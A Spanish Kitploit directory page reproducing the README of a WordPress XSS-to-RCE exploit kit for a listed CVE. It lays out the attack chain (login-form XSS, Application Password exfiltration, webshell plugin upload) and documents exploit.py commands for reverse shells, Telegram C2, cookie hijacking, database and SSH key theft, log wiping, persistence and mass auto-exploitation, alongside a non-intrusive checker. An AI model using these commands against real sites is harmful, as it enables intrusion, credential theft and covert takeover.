Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-64638-PoC-Exploit — 🛡️ CVE-2026-64638 - Suite de evaluación de seguridad de WordPress (CVSS 8.9) | Kit de herramientas de pruebas de penetración de WordPress 4.7.0-7.0.2. Incluye evaluación de vulnerabilidades y módulos de análisis avanzados. 🐍 Verificación segura y explotación, 2 modos. Kit de herramientas avanzado Blue&Red Team Best 2026-64638, solo uso autorizado. Manténgase legal <3zd | Kitploit
Herramientas/GitHubGitHub/tc4dy/cve-2026-64638-poc-exploit
Escalada de PrivilegiosEscáneres de VulnerabilidadesForensia de MemoriaMecanismos de PersistenciaExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónComando y Control

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

🛡️ CVE-2026-64638 - Suite de evaluación de seguridad de WordPress (CVSS 8.9) | Kit de herramientas de pruebas de penetración de WordPress 4.7.0-7.0.2. Incluye evaluación de vulnerabilidades y módulos de análisis avanzados. 🐍 Verificación segura y explotación, 2 modos. Kit de herramientas avanzado Blue&Red Team Best 2026-64638, solo uso autorizado. Manténgase legal <3zd

GitHubtc4dy/cve-2026-64638-poc-exploit

CVE-2026-64638-PoC-Exploit

Ver Repositorio
18hace 1 mesAún no revisado
Compartir

CVE PoC

🌀 CVE‑2026‑64638 – Suite de seguridad WordPress XSS2Shell

Python 3.8+ CVSS Author WordPress

⚠️ SOLO USO ÉTICO – PRUEBAS DE SEGURIDAD AUTORIZADAS
Este repositorio proporciona herramientas únicamente para profesionales de seguridad autorizados, blue teams y probadores de penetración.
El acceso no autorizado a sistemas informáticos es ilegal según la CFAA (EE. UU.), la Computer Misuse Act (Reino Unido), el TCK 243/244 (Turquía) y leyes similares en todo el mundo.


📖 Resumen de la vulnerabilidad

CVE‑2026‑64638 es una vulnerabilidad crítica de XSS reflejado previa a la autenticación en las versiones 4.7.0 a 7.0.2 del núcleo de WordPress que permite a un atacante escalar un ataque XSS a ejecución remota de código (RCE) completa mediante la función Application Password.

Cómo funciona

  1. Diferencial del analizador (parser) – las funciones strip_tags() de PHP y wp_kses_post() de WordPress analizan las etiquetas HTML de forma distinta, lo que permite que una entrada maliciosa supere la sanitización.
  2. XSS reflejado – un atacante inyecta una carga útil especialmente diseñada en el formulario de inicio de sesión (wp-login.php). Tras un inicio de sesión fallido, la carga útil se refleja y se ejecuta en el navegador de la víctima.
  3. Abuso de Application Password – el JavaScript inyectado genera automáticamente una Application Password a través de la API REST de WordPress y la exfiltra al atacante.
  4. Subida de plugin (RCE) – usando la Application Password capturada, el atacante se autentica en el panel de administración y sube un plugin malicioso que contiene un webshell.
  5. Compromiso total del sistema – el webshell permite la ejecución de comandos del sistema, posibilitando reverse shells, persistencia, movimiento lateral y la toma completa del servidor.

Versiones afectadas

  • WordPress 4.7.0 – 7.0.2 – vulnerable
  • WordPress 7.0.3 y posteriores – parcheado
  • Se han aplicado actualizaciones de seguridad a todas las ramas mantenidas.

Parche

  • Actualice a WordPress 7.0.3 o superior.
  • Si no es posible actualizar, deshabilite la función Application Password como solución temporal.

🧰 Herramientas

HerramientaPropósitoUsuario previsto
exploit.pyKit de explotación completo con reverse shell, persistencia, C2, escalada de privilegios, análisis forense de memoria, volcado de base de datos, extracción de claves SSH y escaneo masivo.

📊 Comparación de características


🎯 Resumen de casos de uso


⚙️ Instalación

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]

📋 Parámetros

Parámetros de exploit.py

Parámetros de safecheck.py


💥 Escenarios


📊 Comandos de la shell interactiva


🧪 Uso de endpoints y API

EndpointPropósito
/wp-login.phpPágina de inicio de sesión: punto de inyección XSS

🛡️ Uso responsable

  • Utilice estas herramientas únicamente en sistemas de su propiedad o para los que tenga permiso explícito por escrito para realizar pruebas.
  • El acceso no autorizado es ilegal y poco ético.
  • Los autores no son responsables del mal uso.
  • Respete siempre las leyes y normativas de su país.

Este software se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas.

Cumplimiento legal

Descargar herramienta
Red teams / pentesters autorizados
safecheck.pyComprobador de vulnerabilidades no intrusivo que detecta el reflejo de XSS y evalúa la postura de seguridad sin ejecutar ninguna carga útil maliciosa. Genera informes detallados.Blue teams / auditores de seguridad
Característicaexploit.pysafecheck.py
Detección de vulnerabilidades✅✅
Detección de versión de WordPress✅✅
Detección de reflejo XSS✅✅
Captura de Application Password✅❌
Subida de plugin (RCE)✅❌
Reverse shell✅❌
Beaconing C2 (HTTP/DNS/Telegram)✅❌
Escalada de privilegios✅❌
Análisis forense de memoria✅❌
Volcado de base de datos✅❌
Extracción de claves SSH✅❌
Métodos de persistencia✅❌
Auditoría de cabeceras de seguridad❌✅
Comprobación de exposición de archivos de configuración❌✅
Comprobación de listado de directorios❌✅
Comprobación de exposición de phpinfo❌✅
Escaneo masivo✅✅
Soporte de proxy✅✅
Soporte Tor✅✅
Túnel Ngrok✅❌
Shell interactiva✅❌
Modo no intrusivo (seguro)❌✅
Salida JSON / informe✅✅
EscenarioHerramienta recomendada
Blue Team – verificar si su instalación de WordPress es vulnerablesafecheck.py
Auditoría de seguridad – evaluación de vulnerabilidades no intrusivasafecheck.py
Red Team – pruebas de penetración autorizadas con explotación completaexploit.py
Bug Bounty – pruebas de divulgación responsablesafecheck.py
Escaneo masivo – comprobar múltiples objetivos en busca de vulnerabilidadesexploit.py o safecheck.py
Respuesta a incidentes – comprobar si los sistemas están comprometidossafecheck.py
Post-explotación avanzada – persistencia, C2, forenseexploit.py
ParámetroDescripción
-t, --targetURL de WordPress objetivo (p. ej. https://wordpress-site.com)
-l, --listArchivo que contiene una lista de objetivos (uno por línea) para escaneo masivo
--lhostDirección IP local para callbacks de reverse shell
--lportPuerto local para reverse shell (predeterminado: 4444)
--proxyProxy HTTP/HTTPS (p. ej. http://127.0.0.1:8080)
--timeoutTiempo de espera de la solicitud en segundos (predeterminado: 10)
--retryNúmero de reintentos (predeterminado: 3)
--threadsNúmero de hilos para escaneo masivo (predeterminado: 5)
--exploitExplotar automáticamente los objetivos vulnerables durante el escaneo masivo
--ngrok-tokenAuthtoken de Ngrok para túneles externos
--payload-typeTipo de carga útil XSS: reflected, dom_based, waf_bypass, case_manipulation, double_encoded
--session-hijackHabilitar secuestro de sesión (robar cookies de administrador)
--dump-dbVolcar la base de datos de WordPress (requiere pymysql)
--extract-sshExtraer claves SSH del sistema objetivo
--torEnrutar el tráfico a través de Tor (socks5h://127.0.0.1:9050)
--stealthHabilitar modo sigiloso (suplantar cabeceras, retrasar solicitudes)
--no-cleanupOmitir la limpieza de registros después de la explotación
--ssl-verifyVerificar certificados SSL
--c2-typeTipo de C2: http, dns, telegram
--c2-serverURL del servidor C2 o token de bot de Telegram
--auto-priv-escEscalada de privilegios automática tras obtener shell
--memory-forensicsHabilitar el módulo de análisis forense de memoria
-v, --verboseSalida detallada (verbose)
-q, --quietModo silencioso (salida mínima)
ParámetroDescripción
-t, --targetURL de WordPress objetivo (p. ej. https://wordpress-site.com)
-l, --listArchivo que contiene una lista de objetivos (uno por línea) para escaneo masivo
--timeoutTiempo de espera de la solicitud en segundos (predeterminado: 10)
--retryNúmero de reintentos (predeterminado: 3)
--threadsNúmero de hilos para escaneo masivo (predeterminado: 5)
--proxyProxy HTTP/HTTPS (p. ej. http://127.0.0.1:8080)
--torEnrutar el tráfico a través de Tor (socks5h://127.0.0.1:9050)
--ssl-verifyVerificar certificados SSL
--outputArchivo de informe JSON de salida
-v, --verboseSalida detallada (verbose)
-q, --quietModo silencioso (salida mínima)
#EscenarioComando
1Comprobación rápida de vulnerabilidadespython safecheck.py -t https://wordpress-site.com
2Escaneo detallado con informepython safecheck.py -t https://wordpress-site.com --output report.json -v
3Explotación completa con reverse shellpython exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit
4Usar carga útil XSS personalizadapython exploit.py -t https://wordpress-site.com --payload-type waf_bypass
5Secuestro de sesión (robar cookies de administrador)python exploit.py -t https://wordpress-site.com --session-hijack
6Volcar la base de datos de WordPresspython exploit.py -t https://wordpress-site.com --dump-db
7Extraer claves SSHpython exploit.py -t https://wordpress-site.com --extract-ssh
8Usar Tor para anonimatopython exploit.py -t https://wordpress-site.com --tor --stealth
9Beaconing C2 con Telegrampython exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id"
10Escaneo masivo desde archivopython exploit.py -l targets.txt --threads 10 --exploit
11Análisis forense de memoria tras obtener shellpython exploit.py -t https://wordpress-site.com --memory-forensics
12Escalada de privilegios automáticapython exploit.py -t https://wordpress-site.com --auto-priv-esc
13Shell interactivapython exploit.py -t https://wordpress-site.com -i
14Túnel Ngrokpython exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN
ComandoDescripción
reverseIniciar listener de reverse shell
persistAplicar métodos de persistencia (cron, systemd, rc.local, SSH, WP)
cleanLimpiar registros e historial del sistema
dumpdbVolcar la base de datos de WordPress
sshExtraer claves SSH
privEscalada de privilegios automática
memEjecutar análisis forense de memoria
c2Mostrar estado de C2
c2taskComprobar tareas de C2
exitSalir de la shell interactiva
/wp-admin/authorize-application.php
Generación de Application Password
/wp-admin/update.php?action=upload-pluginSubida de plugin (RCE)
/wp-content/plugins/{slug}/{slug}.phpEjecución del webshell
PaísLey aplicable
Estados UnidosComputer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030
Reino UnidoComputer Misuse Act 1990
TurquíaTCK 243 (Acceso no autorizado), TCK 244 (Interferencia en el sistema)
AlemaniaStGB § 202a (Espionaje de datos), § 202b (Interceptación de datos)
FranciaLoi Godfrain – Artículo 323-1
AustraliaCybercrime Act 2001
CanadáCódigo Penal – Sección 342.1
IndiaInformation Technology Act 2000 – Secciones 43 y 66
JapónLey de Prohibición del Acceso No Autorizado a Computadoras